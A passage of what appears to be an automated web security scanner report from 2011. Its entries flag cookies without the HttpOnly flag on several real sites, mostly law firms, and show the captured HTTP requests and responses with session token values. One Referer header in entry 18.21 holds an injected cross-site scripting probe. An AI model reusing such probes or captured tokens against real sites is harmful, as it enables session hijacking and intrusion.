The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clubportal/ HTTP/1.1
Host: www.goclubexe.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/

Response

HTTP/1.1 301 Moved permanently
Connection: close
Date: Thu, 12 May 2011 18:09:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522795;expires=Sat, 04-May-2041 18:09:28 GMT;path=/
Set-Cookie: CFTOKEN=d03e1acd5f1ad63e-E56627E2-F23E-B9C2-F32B64C184C5DEC3;expires=Sat, 04-May-2041 18:09:28 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522795%26CFTOKEN%23%3Dd03e1acd5f1ad63e%2DE56627E2%2DF23E%2DB9C2%2DF32B64C184C5DEC3%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A28%27%7D%23hitcount%3D2%23cftoken%3Dd03e1acd5f1ad63e%2DE56627E2%2DF23E%2DB9C2%2DF32B64C184C5DEC3%23cfid%3D26522795%23;expires=Sat, 04-May-2041 18:09:28 GMT;path=/
Location: http://www.memberize.com/
Content-Type: text/html; charset=UTF-8

18.12. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news14300.html HTTP/1.1
Host: www.hartfordbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Set-Cookie: PHPSESSID=1b8355f904f52bc3571b2b0ee9c39004; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6bc228ab1c195ad6c6bd4d06455b26ce=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Set-Cookie: 5ff776a7c2ecdadbd916c8b14c203a83=deleted; expires=Wed, 12-May-2010 16:55:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34848

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
18.13. http://www.jdtplaw.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jdtplaw.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.jdtplaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Jackson+DeMarco+Tidus+Peckenpaugh&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 32244
Content-Type: text/html
Expires: Thu, 12 May 2011 14:29:18 GMT
Set-Cookie: ASPSESSIONIDASCDRDSB=NCCKIAACMNBNLELMAOMALENP; path=/
Cache-control: private
Set-Cookie: BIGipServerFIRMSND13-80=423943434.20480.0000; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>JDTP | California Business Law Attorneys, Immigration, Intellectual Pro
...[SNIP]...
18.14. http://www.jdtplaw.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jdtplaw.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.jdtplaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Jackson+DeMarco+Tidus+Peckenpaugh&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 32244
Content-Type: text/html
Expires: Thu, 12 May 2011 14:29:17 GMT
Set-Cookie: ASPSESSIONIDQSSSBBRB=MHONHPPBEJHLIKKBNDCFFDEM; path=/
Cache-control: private
Set-Cookie: BIGipServerFIRMSND13-80=1504003239.20480.0000; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>JDTP | California Business Law Attorneys, Immigration, Intellectual Pro
...[SNIP]...
18.15. http://www.jdtplaw.com/CM/Custom/ClientSuccesses.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jdtplaw.com
Path:   /CM/Custom/ClientSuccesses.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CM/Custom/ClientSuccesses.asp HTTP/1.1
Host: www.jdtplaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jdtplaw.com/PracticeAreas/Real-Estate.asp
Cookie: ASPSESSIONIDQSSSBBRB=MHONHPPBEJHLIKKBNDCFFDEM; BIGipServerFIRMSND13-80=1504003239.20480.0000; CP=null*; s_sess=%20flid%3D1305216566069%3B%20c_m%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaughwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaugh%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.jdtplaw.com%253Apracticeareas%253Areal-estate.asp%255E%255EClient%2520Successes%255E%255Ewww.jdtplaw.com%253Apracticeareas%253Areal-estate.asp%2520%257C%2520Client%2520Successes%255E%255E%3B%20s_sq%3Dfindlaw-12513%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.jdtplaw.com%2525253Apracticeareas%2525253Areal-estate.asp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.jdtplaw.com%2525252FCM%2525252FCustom%2525252FClientSuccesses.asp%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216566074'%255D%255D%7C1463069366074%3B%20s_nr%3D1305216566077%7C1307808566077%3B%20s_vnum%3D1307808566075%2526vn%253D2%7C1307808566075%3B%20ch_directload%3D1%7C1305220777428%3B%20s_invisit%3Dtrue%7C1305220777429%3B%20omtr_lv%3D1305218977430%7C1399826977430%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305220777430%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:49:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 26492
Content-Type: text/html
Expires: Thu, 12 May 2011 15:09:37 GMT
Set-Cookie: ASPSESSIONIDQSRQADRA=PPPCOPPBJNBGFCOMFIJJHOJM; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Client Successes - Law Firm Jackson | DeMarco | Tidus | Peckenpaugh Att
...[SNIP]...
18.16. http://www.jdtplaw.com/CM/NewsResources/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jdtplaw.com
Path:   /CM/NewsResources/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CM/NewsResources/JDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminent-Lawyers.asp HTTP/1.1
Host: www.jdtplaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jdtplaw.com/
Cookie: ASPSESSIONIDQSSSBBRB=MHONHPPBEJHLIKKBNDCFFDEM; BIGipServerFIRMSND13-80=1504003239.20480.0000; CP=null*; s_sess=%20flid%3D1305216566069%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.jdtplaw.com%253Ahome%2520page%255E%255ERead%2520the%2520full%2520article%2520HERE%255E%255Ewww.jdtplaw.com%253Ahome%2520page%2520%257C%2520Read%2520the%2520full%2520article%2520HERE%255E%255E%3B%20c_m%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaughwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaugh%3B%20s_sq%3Dfindlaw-12513%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.jdtplaw.com%2525253Ahome%25252520page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.jdtplaw.com%2525252FCM%2525252FNewsResources%2525252FJDTP-Listed-in-Martindale-Hubbells-Bar-Register-of-Preeminen%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216566074'%255D%255D%7C1463069366074%3B%20s_nr%3D1305216566077%7C1307808566077%3B%20ch_directload%3D1%7C1305220731445%3B%20s_vnum%3D1307808566075%2526vn%253D2%7C1307808566075%3B%20s_invisit%3Dtrue%7C1305220731447%3B%20omtr_lv%3D1305218931449%7C1399826931449%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305220731449%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 22961
Content-Type: text/html
Expires: Thu, 12 May 2011 15:08:52 GMT
Set-Cookie: ASPSESSIONIDQSRQADRA=LBPCOPPBHGKEONPKJALJDIBM; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>JDTP Listed in Martindale Hubbell's Bar Register of Preeminent Lawyers
...[SNIP]...
18.17. http://www.jdtplaw.com/PracticeAreas/Real-Estate.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jdtplaw.com
Path:   /PracticeAreas/Real-Estate.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PracticeAreas/Real-Estate.asp HTTP/1.1
Host: www.jdtplaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jdtplaw.com/PracticeAreas/Mergers-Acquisitions.asp
Cookie: ASPSESSIONIDQSSSBBRB=MHONHPPBEJHLIKKBNDCFFDEM; BIGipServerFIRMSND13-80=1504003239.20480.0000; CP=null*; s_sess=%20flid%3D1305216566069%3B%20c_m%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaughwww.google.comwww.google.com%3B%20omtr_v47_persist%3DNatural%2520Search%3B%20omtr_v49_persist%3Djackson%252Bdemarco%252Btidus%252Bpeckenpaugh%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3Dwww.jdtplaw.com%253Apracticeareas%253Amergers-acquisitions.asp%255E%255E1031%2520Exchanges%255E%255Ewww.jdtplaw.com%253Apracticeareas%253Amergers-acquisitions.asp%2520%257C%25201031%2520Exchanges%255E%255E%3B%20s_sq%3Dfindlaw-12513%252Cfindlaw-global-v1%252Cfindlawfirmstaging%253D%252526pid%25253Dwww.jdtplaw.com%2525253Apracticeareas%2525253Amergers-acquisitions.asp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.jdtplaw.com%2525252FPracticeAreas%2525252FReal-Estate.asp%252526ot%25253DA%3B; s_pers=%20omtr_evar47_cvp%3D%255B%255B'Natural%252520Search'%252C'1305216566074'%255D%255D%7C1463069366074%3B%20s_nr%3D1305216566077%7C1307808566077%3B%20s_vnum%3D1307808566075%2526vn%253D2%7C1307808566075%3B%20ch_directload%3D1%7C1305220744333%3B%20s_invisit%3Dtrue%7C1305220744333%3B%20omtr_lv%3D1305218944334%7C1399826944334%3B%20omtr_lv_s%3DLess%2520than%25201%2520day%7C1305220744334%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:49:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Pragma: No-Cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 26694
Content-Type: text/html
Expires: Thu, 12 May 2011 15:09:04 GMT
Set-Cookie: ASPSESSIONIDQSRQADRA=FHPCOPPBLJFDNICNOFAIEEPC; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Orange County Real Estate Attorney, Irvine CA Construction Lawyer</titl
...[SNIP]...
18.18. http://www.law.com/jsp/article.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.law.com
Path:   /jsp/article.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/article.jsp HTTP/1.1
Host: www.law.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (Red Hat)
Expires: 604800
Location: http://store.law.com/Registration/Login.aspx?ipa=on&mode=silent&source=http://www.law.com/jsp/article.jsp?%26slreturn%3D1
Content-Length: 0
Content-Type: text/html;charset=iso-8859-1
New_Hostname: /jsp/article.jsp@
Vary: Accept-Encoding
New_Hostname: /jsp/article.jsp@
Date: Thu, 12 May 2011 16:55:24 GMT
Connection: close
Set-Cookie: JSESSIONID=0C51439754543CA7811A2479B0683792.node5; Path=/

18.19. http://www.law.com/jsp/nj/PubArticleNJ.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.law.com
Path:   /jsp/nj/PubArticleNJ.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/nj/PubArticleNJ.jsp HTTP/1.1
Host: www.law.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (Red Hat)
Expires: 604800
Location: http://store.law.com/Registration/Login.aspx?ipa=on&mode=silent&source=http://www.law.com/jsp/nj/PubArticleNJ.jsp?%26slreturn%3D1
Content-Length: 0
Content-Type: text/html;charset=iso-8859-1
New_Hostname: /jsp/nj/PubArticleNJ.jsp@
Vary: Accept-Encoding
New_Hostname: /jsp/nj/PubArticleNJ.jsp@
Date: Thu, 12 May 2011 16:55:24 GMT
Connection: close
Set-Cookie: JSESSIONID=7E974B0AEE1896396AE84BA227D79D6F.node5; Path=/

18.20. http://www.layserfreiwald.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.layserfreiwald.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/layser-freiwald

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 12 May 2011 18:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://layserfreiwald.com
Railo-Version: 3.2.2.000
Content-Length: 0
Set-Cookie: CFID=6b80c14b%2Dec78%2D4162%2D88e3%2Dd979751826b4; path=/; expires=Sat, 11-May-2041 02:00:26 GMT
Set-Cookie: CFTOKEN=0; path=/; expires=Sat, 11-May-2041 02:00:26 GMT
Content-Type: text/html; charset=UTF-8

18.21. http://www.letipli.com/_rknet_css.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.letipli.com
Path:   /_rknet_css.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_rknet_css.asp HTTP/1.1
Host: www.letipli.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.letipli.com/member_details.asp8e4b7--%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E76ff3e246a7
Cookie: ASPSESSIONIDACRSARSQ=PKIPPPGAJLLHAGEDEMMHOPGO

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 13 May 2011 00:47:48 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Content-Length: 19237
Content-Type: text/css
Expires: Thu, 12 May 2011 00:47:48 GMT
Set-Cookie: ASPSESSIONIDAASSBRSR=LNBOPBMBDCHGEEDIGNFPLCOP; path=/
Cache-control: Private


body
{
   font-family: Arial, Helvetica, sans-serif;

   background-image: url('/themes/V3/G_bkgd.png');
   background-repeat: repeat-x;
   background-attachment: fixed;
   background-color: #FFFFFF
...[SNIP]...
18.22. http://www.letipli.com/member_details.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.letipli.com
Path:   /member_details.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /member_details.asp HTTP/1.1
Host: www.letipli.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:02:20 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Connection: close
Content-Length: 7058
Content-Type: text/html
Expires: Wed, 11 May 2011 17:02:20 GMT
Set-Cookie: ASPSESSIONIDAASSBRSR=CBAOPBMBBIDOFIDJGBAJAHPK; path=/
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="keywords" con
...[SNIP]...
18.23. http://www.linkedin.com/companies/peck-shaffer-&-williams  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /companies/peck-shaffer-&-williams

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /companies/peck-shaffer-&-williams HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Location: http://www.linkedin.com/company/peck-shaffer-&-williams
Set-Cookie: leo_auth_token="GST:Z3_pLgZ4fNVTSZ-1Qa6P7EZHGIwNfftnCfEnXBQCOvy0fADFXyjFND:1305219326:87c7c59b4436917d053ee8f1e1667c94e1926424"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 17:25:25 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:3348664965776292967"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Tue, 30-May-2079 20:09:33 GMT; Path=/
Set-Cookie: bcookie="v=1&15140d6c-9c43-417f-bbb6-d47c9cfc2ce3"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 30-May-2079 20:09:33 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Date: Thu, 12 May 2011 16:55:26 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999de45525d5f4f58455e445a4a42198c;expires=Thu, 12-May-2011 17:26:41 GMT;path=/;httponly
Content-Length: 0

18.24. http://www.mccarter.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=McCarter+English&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 393
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCACQABB=PKLLAFKBEJGDBLAAIHGDBFBA; path=/
Cache-control: private


<html>
<head>
<script>
   document.location.href = '/new/homenew.aspx'
</script>
   <title>McCarter & English, LLP</title>
   <META HTTP-EQUIV="Refresh" CONTENT="0 ; URL=http://www.mccarter.com/ne
...[SNIP]...
18.25. http://www.mccarter.com/new/homenew.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/homenew.aspx HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=5oju01rog1sq5b55yowdgj55; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 47517


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
18.26. http://www.mccarter.com/new/showlocationnew.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/showlocationnew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/showlocationnew.aspx?show=225 HTTP/1.1
Host: www.mccarter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 18:28:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /new/homenew.aspx
Set-Cookie: ASP.NET_SessionId=or0sev45p5g4bwzl5dxh1s45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/new/homenew.aspx'>here</a>.</h2>
</body></html>
18.27. http://www.memberize.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.memberize.com
Path:   /

Issue detail

